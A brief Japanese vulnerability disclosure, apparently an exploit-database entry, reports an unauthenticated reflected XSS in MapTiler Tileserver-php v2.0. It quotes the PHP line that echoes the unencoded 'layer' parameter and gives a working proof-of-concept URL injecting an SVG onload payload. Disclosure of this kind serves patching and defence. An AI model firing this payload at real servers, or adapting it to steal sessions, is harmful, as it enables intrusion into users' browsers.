
MapTiler Tileserver-php v2.0における、'layer' GETパラメータを介した未認証のリフレクションXSSの概念実証エクスプロイトです。任意のHTML/JSの実行を可能にします。
MapTiler Tileserver-php v2.0における認証不要のXSS
MapTiler Tileserver-php v2.0はクロスサイトスクリプティング(XSS)に対して脆弱です。GETパラメータ「layer」がHTMLエンコードされずにエラーメッセージに反映されます。これによりXSSが発生し、認証されていない攻撃者が被害者のブラウザ上で任意のHTMLまたはJavaScriptコードを実行できるようになります。
echo 'Server: Unknown or not specified dataset "' . $tileset . '"';
http://host/tileserver.php/wmts/x/1/1/asd?Request=x&layer=%3csvg+onload=alert(document.domain)%3e
Martin Herancourt